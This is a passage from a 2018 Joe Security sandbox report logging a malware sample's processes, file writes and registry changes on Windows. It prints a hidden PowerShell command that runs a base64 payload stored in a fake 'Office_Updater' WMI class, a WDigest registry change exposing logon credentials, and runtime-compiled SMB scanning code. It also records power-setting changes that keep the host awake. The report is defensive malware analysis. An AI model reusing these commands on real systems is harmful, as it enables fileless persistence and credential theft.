WriteFile 65 77 20 42 69 6e 61 BinaryReader(ms);... 72 79 52 65 61 64 65 ..byte[] part1 = new byte[] 72 28 6d 73 29 3b 0d {...... 0x00,0x00,0x00,0x00, 0a 09 09 09 62 79 74 ...... 0xff,0x53,0x4d,0x42, 65 5b 5d 20 70 61 72 ...... 0x75, ...... 0x00, 74 31 20 3d 20 6e 65 ...... 0x00, ...... 0x00,0x00, 77 20 62 79 74 65 5b ...... 0x18, ...... 0x01,0x28, 5d 20 7b 0d 0a 09 09 ...... 0x00,0x00, 09 09 30 78 30 30 2c ...... 0x00,0x00,0x00,0x00,0 30 78 30 30 2c 30 78 x00,0x00,0x00,0x 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 66 66 2c 30 78 35 33 2c 30 78 34 64 2c 30 78 34 32 2c 20 0d 0a 09 09 09 09 30 78 37 35 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 31 38 2c 20 0d 0a 09 09 09 09 30 78 30 31 2c 30 78 32 38 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78

Copyright Joe Security LLC 2018 Page 18 of 26 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69 .../t:library /utf8output /R:" success or wait 1 1A108E7 WriteFile 62 72 61 72 79 20 2f System.dll" 75 74 66 38 6f 75 74 /R:"C:\Windows\ass 70 75 74 20 2f 52 3a embly\GAC_MSIL\System. 22 53 79 73 74 65 6d Manageme 2e 64 6c 6c 22 20 2f nt.Automation\1.0.0.0__31 52 3a 22 43 3a 5c 57 bf385 69 6e 64 6f 77 73 5c 6ad364e35\System.Manag 61 73 73 65 6d 62 6c ement.Automation.dll" 79 5c 47 41 43 5f 4d /out:"C:\Users\u 53 49 4c 5c 53 79 73 ser\AppData\Local\Temp\rj 74 65 6d 2e 4d 61 6e ax4qnu.dll" /D:DEBUG 61 67 65 6d 65 6e 74 /debug+ /optimize- 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f 75 74 3a 22 43 3a 5c 55 73 65 72 73 5c 48 65 72 62 20 42 6c 61 63 6b 62 75 72 6e 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 72 6a 61 78 34 71 6e 75 2e 64 6c 6c 22 20 2f 44 3a 44 45 42 55 47 20 2f 64 65 62 75 67 2b 20 2f 6f 70 74 69 6d 69 7a 65 2d 20 C:\Users\user\AppData\Local\Temp\rjax4qnu.out unknown 422 ef bb bf 43 3a 5c 55 73 ...C:\Users\user\Desktop> success or wait 1 1A108E7 WriteFile 65 72 73 5c 48 65 72 "C:\ 62 20 42 6c 61 63 6b Windows\Microsoft.NET\Fr 62 75 72 6e 5c 44 65 amewor 73 6b 74 6f 70 3e 20 k\v2.0.50727\csc.exe" 22 43 3a 5c 57 69 6e /t:library /utf8output 64 6f 77 73 5c 4d 69 /R:"System.dll" 63 72 6f 73 6f 66 74 2e /R:"C:\Windows\assembly\ 4e 45 54 5c 46 72 61 GAC_M 6d 65 77 6f 72 6b 5c SIL\System.Management. 76 32 2e 30 2e 35 30 Automati 37 32 37 5c 63 73 63 on\1.0.0.0__31bf3856ad36 2e 65 78 65 22 20 2f 4e35\S 74 3a 6c 69 62 72 61 ystem.Management.Autom 72 79 20 2f 75 74 66 ation.dll" /o 38 6f 75 74 70 75 74 20 2f 52 3a 22 53 79 73 74 65 6d 2e 64 6c 6c 22 20 2f 52 3a 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 61 73 73 65 6d 62 6c 79 5c 47 41 43 5f 4d 53 49 4c 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f

Registry Activities

Key Value Created

Source Key Path Name Type Data Completion Count Address Symbol HKEY_LOCAL_MACHINE\SYSTEM\Cont UseLogonCredential dword 1 success or wait 1 1A137EA RegSetValueExW rolSet001\Control\SecurityProviders\WDigest

General

Start time: 04:06:19 Start date: 24/01/2018 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f Imagebase: 0x774a0000 File size: 179712 bytes MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3 Programmed in: C, C++ or other language Reputation: low

Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084

General

Start time: 04:06:19 Start date: 24/01/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 Imagebase: 0x74150000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Programmed in: C, C++ or other language Reputation: low

Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084

General

Start time: 04:06:19 Start date: 24/01/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 Imagebase: 0x74150000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Programmed in: C, C++ or other language Reputation: low

Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084

General

Start time: 04:06:20 Start date: 24/01/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 Imagebase: 0x74150000 File size: 59392 bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Copyright Joe Security LLC 2018 Page 20 of 26 Programmed in: C, C++ or other language Reputation: low

Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084

General

Start time: 04:06:20 Start date: 24/01/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0x74d60000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Programmed in: C, C++ or other language Reputation: low

File Activities

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Analysis Process: csc.exe PID: 3416 Parent PID: 3084

General

Start time: 04:06:23 Start date: 24/01/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Wow64 process (32bit): false Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\us er\AppData\Local\Temp\rjax4qnu.cmdline' Imagebase: 0x75a90000 File size: 77960 bytes MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D Programmed in: .Net C# or VB.NET Reputation: low

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Source File Path Completion Count Address Symbol

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416

General

Start time: 04:06:23 Start date: 24/01/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe Wow64 process (32bit): false

Copyright Joe Security LLC 2018 Page 21 of 26 Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp' 'c:\Users\user\ AppData\Local\Temp\CSC278A.tmp' Imagebase: 0x752a0000 File size: 32912 bytes MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364 Programmed in: C, C++ or other language Reputation: low

File Activities

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084

General

Start time: 04:06:24 Start date: 24/01/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0x74d60000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Programmed in: C, C++ or other language Reputation: low

File Activities

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Analysis Process: powershell.exe PID: 3464 Parent PID: 3084

General

Start time: 04:06:24 Start date: 24/01/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ( [WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default: Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([S ystem.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock - ArgumentList @($mon, $mon, 'Void', 0, '', '')' Imagebase: 0x774a0000 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Programmed in: .Net C# or VB.NET Reputation: low

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\oyswbnum.tmp read attributes none synchronous io success or wait 1 172064F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall Copyright Joe Security LLC 2018 Page 22 of 26 Source File Path Access Attributes Options Completion Count Address Symbol

C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs read attributes none synchronous io success or wait 1 172064F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp\oyswbnum.dll read attributes none synchronous io success or wait 1 172064F CreateFileW and synchronize non alert and n and generic on directory file read and and open no generic write recall C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline read attributes none synchronous io success or wait 1 172064F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp\oyswbnum.out read attributes none synchronous io success or wait 1 172064F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp\oyswbnum.err read attributes none synchronous io success or wait 1 172064F CreateFileW and synchronize non alert and n and generic on directory file write and open no recall

File Deleted

Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\oyswbnum.dll success or wait 1 17201D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.pdb success or wait 1 17201D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.out success or wait 1 17201D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.err success or wait 1 17201D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline success or wait 1 17201D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.tmp success or wait 1 17201D2 DeleteFileW C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs success or wait 1 17201D2 DeleteFileW

Source Old File Path New File Path Completion Count Address Symbol

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Copyright Joe Security LLC 2018 Page 23 of 26 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs unknown 4096 ef bb bf 75 73 69 6e 67 ...using System;..using success or wait 1 1720807 WriteFile 20 53 79 73 74 65 6d System 3b 0d 0a 75 73 69 6e .Collections.Generic;..usin 67 20 53 79 73 74 65 g S 6d 2e 43 6f 6c 6c 65 ystem.Diagnostics;..using 63 74 69 6f 6e 73 2e System.IO;..using 47 65 6e 65 72 69 63 System.Net;..using 3b 0d 0a 75 73 69 6e System.Net.Sockets;..usin 67 20 53 79 73 74 65 g 6d 2e 44 69 61 67 6e System.Text;....namespac 6f 73 74 69 63 73 3b e PingCastle.Scanners.. 0d 0a 75 73 69 6e 67 {...public class m17sc... 20 53 79 73 74 65 6d {....static public bool 2e 49 4f 3b 0d 0a 75 Scan(stri 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 54 65 78 74 3b 0d 0a 0d 0a 6e 61 6d 65 73 70 61 63 65 20 50 69 6e 67 43 61 73 74 6c 65 2e 53 63 61 6e 6e 65 72 73 0d 0a 7b 0d 0a 09 70 75 62 6c 69 63 20 63 6c 61 73 73 20 6d 31 37 73 63 0d 0a 09 7b 0d 0a 09 09 73 74 61 74 69 63 20 70 75 62 6c 69 63 20 62 6f 6f 6c 20 53 63 61 6e 28 73 74 72 69 C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs unknown 1730 64 65 72 20 3d 20 6e der = new success or wait 1 1720807 WriteFile 65 77 20 42 69 6e 61 BinaryReader(ms);... 72 79 52 65 61 64 65 ..byte[] part1 = new byte[] 72 28 6d 73 29 3b 0d {...... 0x00,0x00,0x00,0x00, 0a 09 09 09 62 79 74 ...... 0xff,0x53,0x4d,0x42, 65 5b 5d 20 70 61 72 ...... 0x75, ...... 0x00, 74 31 20 3d 20 6e 65 ...... 0x00, ...... 0x00,0x00, 77 20 62 79 74 65 5b ...... 0x18, ...... 0x01,0x28, 5d 20 7b 0d 0a 09 09 ...... 0x00,0x00, 09 09 30 78 30 30 2c ...... 0x00,0x00,0x00,0x00,0 30 78 30 30 2c 30 78 x00,0x00,0x00,0x 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 66 66 2c 30 78 35 33 2c 30 78 34 64 2c 30 78 34 32 2c 20 0d 0a 09 09 09 09 30 78 37 35 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 31 38 2c 20 0d 0a 09 09 09 09 30 78 30 31 2c 30 78 32 38 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 20 0d 0a 09 09 09 09 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78 30 30 2c 30 78

Copyright Joe Security LLC 2018 Page 24 of 26 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69 .../t:library /utf8output /R:" success or wait 1 1720807 WriteFile 62 72 61 72 79 20 2f System.dll" 75 74 66 38 6f 75 74 /R:"C:\Windows\ass 70 75 74 20 2f 52 3a embly\GAC_MSIL\System. 22 53 79 73 74 65 6d Manageme 2e 64 6c 6c 22 20 2f nt.Automation\1.0.0.0__31 52 3a 22 43 3a 5c 57 bf385 69 6e 64 6f 77 73 5c 6ad364e35\System.Manag 61 73 73 65 6d 62 6c ement.Automation.dll" 79 5c 47 41 43 5f 4d /out:"C:\Users\u 53 49 4c 5c 53 79 73 ser\AppData\Local\Temp\o 74 65 6d 2e 4d 61 6e yswbnum.dll" /D:DEBUG 61 67 65 6d 65 6e 74 /debug+ /optimize- 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f 75 74 3a 22 43 3a 5c 55 73 65 72 73 5c 48 65 72 62 20 42 6c 61 63 6b 62 75 72 6e 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 6f 79 73 77 62 6e 75 6d 2e 64 6c 6c 22 20 2f 44 3a 44 45 42 55 47 20 2f 64 65 62 75 67 2b 20 2f 6f 70 74 69 6d 69 7a 65 2d 20 C:\Users\user\AppData\Local\Temp\oyswbnum.out unknown 422 ef bb bf 43 3a 5c 55 73 ...C:\Users\user\Desktop> success or wait 1 1720807 WriteFile 65 72 73 5c 48 65 72 "C:\ 62 20 42 6c 61 63 6b Windows\Microsoft.NET\Fr 62 75 72 6e 5c 44 65 amewor 73 6b 74 6f 70 3e 20 k\v2.0.50727\csc.exe" 22 43 3a 5c 57 69 6e /t:library /utf8output 64 6f 77 73 5c 4d 69 /R:"System.dll" 63 72 6f 73 6f 66 74 2e /R:"C:\Windows\assembly\ 4e 45 54 5c 46 72 61 GAC_M 6d 65 77 6f 72 6b 5c SIL\System.Management. 76 32 2e 30 2e 35 30 Automati 37 32 37 5c 63 73 63 on\1.0.0.0__31bf3856ad36 2e 65 78 65 22 20 2f 4e35\S 74 3a 6c 69 62 72 61 ystem.Management.Autom 72 79 20 2f 75 74 66 ation.dll" /o 38 6f 75 74 70 75 74 20 2f 52 3a 22 53 79 73 74 65 6d 2e 64 6c 6c 22 20 2f 52 3a 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 61 73 73 65 6d 62 6c 79 5c 47 41 43 5f 4d 53 49 4c 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f 33 31 62 66 33 38 35 36 61 64 33 36 34 65 33 35 5c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 41 75 74 6f 6d 61 74 69 6f 6e 2e 64 6c 6c 22 20 2f 6f

Analysis Process: csc.exe PID: 3552 Parent PID: 3464

General

Start time: 04:06:42 Start date: 24/01/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Wow64 process (32bit): false Copyright Joe Security LLC 2018 Page 25 of 26 Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\us er\AppData\Local\Temp\oyswbnum.cmdline' Imagebase: 0x74db0000 File size: 77960 bytes MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D Programmed in: .Net C# or VB.NET Reputation: low

Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552

General

Start time: 04:06:43 Start date: 24/01/2018 Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe Wow64 process (32bit): false Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACH INE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp' 'c:\Users\user\ AppData\Local\Temp\CSC75BC.tmp' Imagebase: 0x752a0000 File size: 32912 bytes MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364 Programmed in: C, C++ or other language Reputation: low

Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084

General

Start time: 04:06:47 Start date: 24/01/2018 Path: C:\Windows\System32\NETSTAT.EXE Wow64 process (32bit): false Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp Imagebase: 0x6e510000 File size: 27136 bytes MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561 Programmed in: C, C++ or other language Reputation: low

Disassembly

Code Analysis